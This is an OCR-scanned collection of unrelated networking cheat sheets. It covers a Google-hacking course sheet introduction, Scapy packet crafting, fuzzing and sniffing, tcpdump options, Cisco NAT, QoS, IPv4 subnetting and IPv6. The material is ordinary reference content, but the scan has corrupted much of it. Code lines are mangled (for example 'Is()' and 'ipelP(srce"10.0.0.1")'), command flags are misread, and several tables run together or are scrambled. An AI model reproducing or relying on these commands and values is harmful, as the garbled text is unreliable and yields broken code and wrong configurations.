This document aims to be a quick reference 
outlining all Google operators, their 
meaning, and examples of their usage. 


What to use this sheet for 


Use this sheet as a handy reference that outlines the 
various Google searches that you can perform. It is 
meant to support you throughout the Google Hacking 
and Defense course and can be used as a quick 
reference guide and refresher on all Google advanced 
operators used in this course. The student could also 
use this sheet as guidance in building innovative 
operator combinations and new search techniques. 


This sheet is split into these sections: 
Operator Examples 
Advanced Operators 


Number Searching 


Calculator Operators 
Search Parameters 


References: 


http://www.google.com/intl/en/help/refinesearch.html 
http://johnny.ihackstuff.com 
http://www.google.com/intl/en/help/cheatsheet.html 
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SCAPY 


Basic Commands 
Is() 
List all available protocols and protocol options 


Isc() 
List all available scapy command functions 


conf 
Show/set scapy configuration parameters 


Constructing Packets 


# Setting protocol fields 
>>> ipelP(srce"10.0.0.1") 
>>> ip.dst="10.0.0.2" 


4 Combining Layers 
>>> L3=IP()/TCP() 
>>> 12-Ether( )/13 


# Splitting layers apart 

>>> 12.getlayer(1) 

«IP frag=0 proto=tcp |<TCP |>> 
>>> 12.getlayer(2) 

«TCP |» 


Displaying Packets 


# Show an entire packet 
>>> (Ether()/IPv6()).show() 
###[ Ethernet |### 
dete TT:TTITIESTTSETT:TT 
src= 00:00:00:00:00:00 
type= Ox86dd 
###[ IPv6 |### 
version= 6 
tc= 0 
fl= 0 
plen= None 
nh= No Next Header 
hlim= 64 
src= ::1 
aste svi 


# Show field types with default values 


>>> Is(UDP()) 

sport : ShortEnumField 
dport : ShortEnumField 
Len : ShortField 
chksum : XShortField 


1025 (53) 
53 (53) 


Fuzzing 


# Randomize fields where applicable 
>>> fuzz(ICMP()).show() 
###[ ICMP |### 

type= <RandByte> 


code= 227 
chksum= None 
unused= <RandInt> 


None (None) 
None (None) 
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Specifying Addresses and Values 


# Explicit IP address (use quotation marks) 
>>> IP(dst="192.0.2.1") 


# DNS name to be resolved at time of transmission 
>>> IP(dst="example.com") 


# IP network (results in a packet template) 
>>> IP(dst="192.0.2.0/24") 


# Random addresses with RandIP() and RandMAC() 
>>> IP(dst=RandIP()) 
>>> Ether(dst=RandMAC()) 


# Set a range of numbers to be used (template) 
>>> IP(ttl=(1,30)) 


# Random numbers with RandInt() and RandLong() 
>>> IP(id=RandInt()) 


Sending Packets 
send(pkt, inter=0, loop=0, count=1, iface=N) 
Send one or more packets at layer three 
sendp(pkt, inter=0, loop=0, count=1, iface=N) 
Send one or more packets at layer two 
sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N) 
Send packets much faster at layer two using tcpreplay 


>>> send(IP(dst="192.0.2.1")/UDP(dport=53)) 


Sent 1 packets. 
>>> sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53)) 


Sent 1 packets. 


Sending and Receiving Packets 


Sr(pkt, filter=N, iface=N), srp(...) 

Send packets and receive replies 

sri(pkt, inter=0, loop=0, count=1, iface=N), srp1(...) 
Send packets and return only the first reply 


srloop(pkt, timeout=N, count=N), srploop(...) 
Send packets in a loop and print each reply 


>>> srloop(IP(dst="packetlife.net")/ICMP(), count=3) 
RECV 1: IP / ICMP 174.143.213.184 » 192.168.1.140 
RECV 1: IP / ICMP 174.143.213.184 » 192.168.1.140 
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140 


Sniffing Packets 
sniff(count=0, store=1, timeout=N) 
Record packets off the wire; returns a list of packets when stopped 


# Capture up to 100 packets (or stop with ctrl-c) 
>>> pkts=sniff(count=100, iface="etho") 


>>> pkts 
«Sniffed: TCP:92 UDP:7 ICMP:1 Other:0> 


TCPDUMP packetlife.net 
Command Line Options 
-A Print frame payload in ASCII -q Quick output 
-c «count» Exit after capturing count packets -r «file» Read packets from file 
-D List available interfaces -S «len» Capture up to len bytes per packet 
-e Print link-level headers -5 Print absolute TCP sequence numbers 
-F <file> Use file as the filter expression -t Don't print timestamps 
-G <n> Rotate the dump file every n seconds -v[v[v]] Print more verbose output 


-1 «iface» Specifies the capture interface 


-w «file» Write captured packets to file 


-K Don't verify TCP checksums -X Print frame payload in hex 

-L List data link types for the interface -X Print frame payload in hex and ASCII 
-n Don't convert addresses to names -y «type» Specify the data link type 

-p Don't capture in promiscuous mode -Z «user» Drop privileges from root to user 


Capture Filter Primitives 


[src|dst] host «host» 

ether [src|dst] host <ehost> 

gateway host <host> 

[src|dst] net <network>/<len> 

[tcp|udp] [src|dst] port «port» 
[tcp|udp] [src|dst] portrange <pl>-<p2> 
less <length> 

greater «length» 

(ether|ip|ip6) proto «protocol» 
(ether|ip) broadcast 

(ether|ip|ip6) multicast 

type (mgt|ctl|data) [subtype <subtype>] 
vlan [«vlan»] 

mpls [<label>] 


«expr» «relop» «expr» 


Matches a host as the IP source, destination, or either 
Matches a host as the Ethernet source, destination, or either 
Matches packets which used host as a gateway 

Matches packets to or from an endpoint residing in network 
Matches TCP or UDP packets sent to/from port 

Matches TCP or UDP packets to/from a port in the given range 
Matches packets less than or equal to length 

Matches packets greater than or equal to length 

Matches an Ethernet, IPv4, or IPv6 protocol 

Matches Ethernet or IPv4 broadcasts 

Matches Ethernet, IPv4, or IPv6 multicasts 

Matches 802.11 frames based on type and optional subtype 
Matches 802.1Q frames, optionally with a VLAN ID of vlan 
Matches MPLS packets, optionally with a label of label 


Matches packets by an arbitrary expression 


Protocols Modifiers Examples 
arp ip6 slip ! or not udp dst port not 53 UDP not bound for port 53 
ether link tcp && or and host 10.0.0.1 && host 10.0.0.2 Traffic between these hosts 
fddi ppp tr || or or tcp dst port 80 or 8080 Packets to either TCP port 
icmp radio udp ICMP Types 
ip nab wlan icmp-echoreply icmp-routeradvert icmp-tstampreply 

TCP Flags icmp-unreach icmp-routersolicit icmp-ireq 
tcp-urg tcp-rst icmp-sourcequench icmp-timxceed icmp-ireqreply 
tcp-ack tcp-syn icmp-redirect icmp-paramprob icmp-maskreq 
tcp-psh tcp- fin icmp-echo icmp-tstamp icmp-maskreply 
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Example Topology Address Classification 


An actual address assigned to 


Inside Local an inside host 


An inside address seen from 
the outside 

An actual address assigned to 
an outside host 


Inside Global 


FastEthernetO FastEthernet1 Outside Global 
10.0.0.1/16 174.143.212.1/22 


NAT Inside NAT Outside Outside Local An outside address seen from 
the inside 


NAT Boundary Configuration 


interface FastEthernetO 
ip address 10.0.0.1 255.255.0.0 

ip nat inside 

| 

interface FastEthernetl 

ip address 174.143.212.1 255.255.252.0 
ip nat outside 


Inside Local Inside Global 
Outside Local | Outside Global 


Static Source Translation Terminology 


c 
o 
= 
(o 
© 
o 
- 


NAT Pool 
A pool of IP addresses to be used as inside 
global or outside local addresses in translations 


Port Address Translation (PAT) 

An extension to NAT that translates information 
at layer four and above, such as TCP and UDP 
Dynamic Source Translation port numbers; dynamic PAT configurations 
include the overload keyword 


! One line per static translation 
ip nat inside source static 10.0.0.19 192.0.2.1 

ip nat inside source static 10.0.1.47 192.0.2.2 

ip nat outside source static 174.143.212.133 10.0.0.47 
ip nat outside source static 174.143.213.240 10.0.2.181 


! Create an access list to match inside local addresses 
access-list 10 permit 10.0.0.0 0.0.255.255 
| 
! Create NAT pool of inside global addresses 
ip nat pool MyPool 192.0.2.1 192.0.2.254 prefix-length 24 
| 


Extendable Translation 

The extendable keyword must be appended 
when multiple overlapping static translations are 
configured 


! Combine them with a translation rule Special NAT Pool Types 


ip nat inside source list 10 pool MyPool Rotary Used for load balancing 
| 

! Dynamic translations can be combined with static entries 
ip nat inside source static 10.0.0.42 192.0.2.42 


— — — — —— — — — nf 


Match- Preserves the host portion of 
Host the address after translation 


Port Address Translation (PAT) Troubleshooting 


I Static layer four port translations shov ip nat translations lverbosel 
ip nat inside source static tcp 10.0.0.3 8080 192.0.2.1 80 
ip nat inside source static udp 10.0.0.14 53 192.0.2.2 53 
ip nat outside source static tcp 174.143.212.4 23 10.0.0.8 23 clear ip nat translations 
| 


show ip nat statistics 


! Dynamic port translation with a pool NAT Translations Tuning 
ip nat inside source list 11 pool MyPool overload 

| 

! Dynamic translation with interface overloading 

ip nat inside source list 11 interface FastEthernetl overload 


—” 


ip nat translation tcp-timeout «seconds» 
ip nat translation udp-timeout «seconds» 
ip nat translation max-entries «number» 


Inside Destination Translation 


————————— —”—”..,—U AU £$£ TU CI 7/20 
I Create a rotary NAT pool 


ip nat pool LoadBalServers 10.0.99.200 10.0.99.203 prefix-length 24 type rotary 


I Enable load balancing across inside hosts for incoming traffic 
ip nat inside destination list 12 pool LoadBalServers 


QUALITY OF SERVICE : PART 1 


Quality of Service Models 


Best Effort : No QoS policies are implemented 


Integrated Services (IntServ) 


Resource Reservation Protocol (RSVP) is used to reserve bandwidth per- 


flow across all nodes in a path 
Differentiated Services (DiffServ) 


Packets are individually classified and marked; policy decisions are made 


independently by each node in a path 


Layer 2 QoS Markings 


Medium Name 
Ethernet Class of Service (CoS) 


Frame Relay Discard Eligibility (DE) 
ATM Cell Loss Priority (CLP) 
MPLS Traffic Class (TC) 


Type 
3-bit 802.1p field in 802.1Q header 


1-bit drop eligibility flag 
1-bit drop eligibility flag 
3-bit field compatible with 802.1p 


IP QoS Markings 


IP Precedence 


The first three bits of the IP TOS field; 


limited to 8 traffic classes 


Differentiated Services Code Point (DSCP) 
The first six bits of the IP TOS are evaluated to provide more granular 
classification; backward-compatible with IP Precedence 


QoS Flowchart 


Software Queue 


Software Queue 


Software Queue 


Hardware 
Queue 


Jejnpoyos 


Terminology 


Per-Hop Behavior (PHB) 


The individual QoS action performed at each independent DiffServ node 


Trust Boundary : Beyond this, inbound QoS markings are not trusted 


Tail Drop : Occurs when a packet is dropped because a queue is full 


Policing 


Imposes an artificial ceiling on the amount of bandwidth that may be 
consumed; traffic exceeding the policer rate is reclassified or dropped 


Shaping 


Similar to policing but buffers excess traffic for delayed transmission; 
makes more efficient use of bandwidth but introduces a delay 


TCP Synchronization 


Flows adjust TCP window sizes in synch, making inefficient use of a link 


DSCP Per-Hop Behaviors 


Class Selector (CS) : Backward-compatible with IP Precedence values 


Assured Forwarding (AF) - Four classes with variable drop preferences 


Expedited Forwarding (EF) - Priority queuing for delay-sensitive traffic 
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IP Type of Service (TOS) 


Precedence IT | 
ə” N 
osce HANNE 


Precedence/DSCP 
Binary DSCP Prec. 
56 111000 Reserved 7 
48 110000 Reserved 6 
46 101110 EF 5 
32 100000  CS4 
34 100010 AF41 
36 100100 AF42 i 
38 100110 AF43 
24 011000  CS3 
26 011010 AF31 
28 011100 AF32 É 
30 011110 AF33 
16 010000  CS2 
18 010010 AF21 
20 010100  AF22 : 
22 010110 AF23 
8 001000  CS1 
10 001010  AF11 
12 001100 AF12 ; 
14 001110 AF13 
O 000000 BE 0 


Congestion Avoidance 


Random Early Detection (RED) 
Packets are randomly dropped 
before a queue is full to prevent tail 
drop; mitigates TCP 
synchronization 


Weighted RED (WRED) 

RED with the added capability of 
recognizing prioritized traffic based 
on its marking 


Class-Based WRED (CBWRED) 
WRED employed inside a class- 
based WFQ (CBWFQ) queue 
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Queuing Comparison 


FIFO PQ CQ WFQ CBWFQ LLQ 

Default on Interfaces `2 Mbps NO NO <=2 Mbps No No 
Number of Queues 1 4 Configured Dynamic Configured Configured 

Configurable Classes No Yes Yes No Yes Yes 


Bandwidth Allocation Automatic Automatic Configured Automatic Configured Configured 


Provides for Minimal Delay No Yes No No No Yes 
Modern Implementation Yes No No No Yes Yes 
First In First Out (FIFO) Priority Queuing (PQ) LLQ Config Example 


Class Definitions 


High 


! Match packets by DSCP value 
class-map match-all Voice 
match dscp ef 


Hardware Queue 57 class-map match-all Call-Signaling 
Low match dscp cs3 
: Packets are transmitted in the | 
order they are processed - Provides four static queues which | Class-map match-any Critical-Apps 
- No prioritization is provided cannot be reconfigured Me dscp af21 af22 
- Default queuing method on high- ' Higher-priority queues are I Match packets by access list 
speed (>2 Mbps) interfaces always emptied before lower- class-map match-all Scavenger 
- Configurable with the tx-ring- priority queues match access-group name Other 
limit interface config command : Lower-priority queues are at risk - - 
of bandwidth starvation policy-map Foo Policy Creation 
Custom Queuing (CQ) class Voice 
Weighted Fair Queuing (WFQ) I Priority queue policed to 33% 
Queue A | san saa priority percent 33 
Flow 1 class Call-Signaling 
Queue B | s m I Allocate 5% of bandwidth 
TER Flow 2 EFE bandwidth percent 5 
Queue C 1500 B/cycle Queue class Critical-Apps 
Hardware bandwidth percent 20 
- Rotates through queues using Flown Queue ! Extend queue size to 96 packets 
Weighted Round Robin (WRR) ! queue-limit 96 
p asker B Queues are dynamically created Class Scavenger 
7777777 per flovv to ensure fair processing I Police to 64 kbps 


of bytes from each queue per turn 


: Prevents queue starvation but 
does not provide for delay- 


police cir 64000 
conform-action transmit 
exceed-action drop 


: Statistically drops packets from 
aggressive flows more often 


. : - No support for delay-sensitive class class-default 
sensitive traffic traffic ! Enable WFQ 
Class-Based WFQ (CBWFQ) 141351: 


Lovv Latency Queuing (LLQ) I Enable WRED 


dusunun | 512 Kbps — random-detect 
Queue B. fr GN 
Queue A POT in 


Hardware 


interface Serial® Policy Application 
I Apply the policy in or out 


service-policy output Foo 


Default Remainder 


Queue QueueB 000 m» 
- WFQ with administratively Defau İm” 7 LLQ Config Example 
. ueue 
configured queues show policy-map [interface] 
: Each queue is allocated an : CBWFQ with the addition of a —|( À—— 
amount/percentage of bandwidth policed strict-priority queue 
- No support for delay-sensitive - Highly configurable while still show queue «interface» 


traffic supporting delay-sensitive traffic Show mls qos 


IPV4 SUBNETTING packétiifamèt 


Subnets Decimal to Binary 

CIDR Subnet Mask Addresses Wildcard Subnet Mask Wildcard 

/32 255.255.255.255 1 0.0.0.0 255 1111 1111 0 0000 0000 
/31 255.255.255.254 2 0.0.0.1 254 1111 1110 1 0000 0001 
/30 255.255.255.252 4 0.0.0.3 252 1111 1100 3 0000 0011 
/29 255.255.255.248 8 0.0.0.7 248 1111 1000 7 0000 0111 
/28 255.255.255.240 16 0.0.0.15 240 1111 0000 15 0000 1111 
/27 255.255.255.224 32 0.0.0.31 224 1110 0000 31 0001 1111 
/26 255.255.255.192 64 0.0.0.63 192 1100 0000 63 0011 1111 
/25 255.255.255.128 128 0.0.0.127 128 1000 0000 127 0111 1111 
/24 255.255.255.0 256 0.0.0.255 0 0000 0000 255 1111 1111 
/23 255.255.254.0 512 0.0.1.255 nalen 

/22 255.255.252.0 1,024 0.0.3.255 

/21 255.255.248.0 2,048 0.0.7.255 

/20 255.255.240.0 4,096 0.0.15.255 

/19 255.255.224.0 8,192 0.0.31.255 

/18 255.255.192.0 16,384 0.0.63.255 via 
/17 255.255.128.0 32,768 0.0.127.255 L— x. 
/16 255.255.0.0 65,536 0.0.255.255 

/15 255.254.0.0 131,072 0.1.255.255 

/14 255.252.0.0 262,144 0.3.255.255 

/13 255.248.0.0 524,288 0.7.255.255 

/12 255.240.0.0 1,048,576 0.15.255.255 

/11 255.224.0.0 2,097,152 0.31.255.255 

/10 255.192.0.0 4,194,304 0.63.255.255 Classful Ranges 

/9 255.128.0.0 8,388,608 0.127.255.255 A 0.0.0.0 - 127.255.255.255 

/8 255.0.0.0 16,777,216 0.255.255.255 B 128.0.0.0 - 191.255.255.255 

/7 254.0.0.0 33,554,432 1.255.255.255 C 192.0.0.0 - 223.255.255.255 

/6 252.0.0.0 67,108,864 3.255.255.255 D 224.0.0.0 - 239.255.255.255 

/5 248.0.0.0 134,217,728 7.255.255.255 E 240.0.0.0 - 255.255.255.255 

/4 240.0.0.0 268,435,456 15.255:255.255 Reserved Ranges 

/3 224.0.0.0 536,870,912 31.255.255.255 RFC 1918 10.0.0.0 - 10.255.255.255 

/2 192.0.0.0 1,073,741,824 63.255.255.255 Localhost 127.0.0.0 - 127.255.255.255 
/1 128.0.0.0 2,147,483,648 127.255.255.255 RFC 1918 172.16.0.0 - 172.31.255.255 
/0 0.0.0.0 4,294,967,296 255.255.255.255 RFC 1918 192.168.0.0 - 192.168.255.255 

Terminology 

CIDR VLSM 
Classless interdomain routing was developed to Variable-length subnet masks are an arbitrary length 
provide more granularity than legacy classful between 0 and 32 bits; CIDR relies on VLSMs to define 


addressing; CIDR notation is expressed as /XX routes 
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IPV6 
Protocol Header 


8 16 24 32 . Eliminate leading zeros from all two-byte sets 


Traffic Class Flow Label - Replace up to one string of consecutive zeros 
Payload Length Next Header Hop Limit with a double-colon (::) 


Address Formats 


Address Notation 


S Add 
ource ress Global unicast 


Global Prefix Subnet 


Destination Address 48 16 64 


Link-local unicast 


FE80::/64 Interface ID 


64 64 


Version (4 bits) - Always set to 6 
Traffic Class (8 bits) - A DSCP value for QoS 
Flow Label (20 bits) : Identifies unique flows (optional) 


Multicast 
BH 
8 4 4 112 

EUI-64 Formation 

100] 0a | 27 | 5c [88] 19. 
cuis. 02 |0a [27 | ff fe [5c] 88] 19 


+ Insert Oxfffe between the two halves of the MAC 


Payload Length (16 bits) : Length of the payload in bytes 
Next Header (8 bits) : Header or protocol which follows 
Hop Limit (8 bits) : Similar to IPv4's time to live field 
Source Address (128 bits) : Source IP address 


Destination Address (128 bits) : Destination IP address MAC 


Address Types 
Unicast : One-to-one communication 
Multicast : One-to-many communication 


Anycast - An address configured in multiple locations - Flip the seventh bit (universal/local flag) to 1 


Multicast Scopes Extension Headers 


1 Interface-local 5 Site-local Hop-by-hop Options (0) 

ee 8 Org-local Carries additional information which must be examined by every 
router in the path 

4 Admin-local E Global 


Routing (43) 
Provides source routing functionality 


Special-Use Ranges 
P 9 Fragment (44) 


::/0 Default route Included when a packet has been fragmented by its source 
::/128 Unspecified Encapsulating Security Payload (50) 

Provides payload encryption (IPsec) 
::1/128 Loopback 

/ P Authentication Header (51) 

::/96 IPv4-compatible* ^| Provides packet authentication (IPsec) 
::FFFF:0:0/96 IPv4-mapped Destination Options (60) 

Carries additional information which pertains only to the recipient 
2001::/32 Teredo 
2001:DB8::/32 Documentation ee ete Se 

Dual Stack 
52757 57 Transporting IPv4 and IPv6 across an infrastructure simultaneously 
FCOO::/7 Unique local Tunneling 
FE80::/10 Link-local unicast IPv6 traffic is encapsulated into IPv4 using IPv6-in-IP, UDP (Teredo), 

or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) 
FECO::/10 Site-local unicast* i 
| Translation 

FF00::/8 Multicast Stateless IP/ICMP Translation (SIIT) translates IP header fields, NAT 


* Deprecated Protocol Translation (NAT-PT) maps between IPv6 and IPv4 addresses 


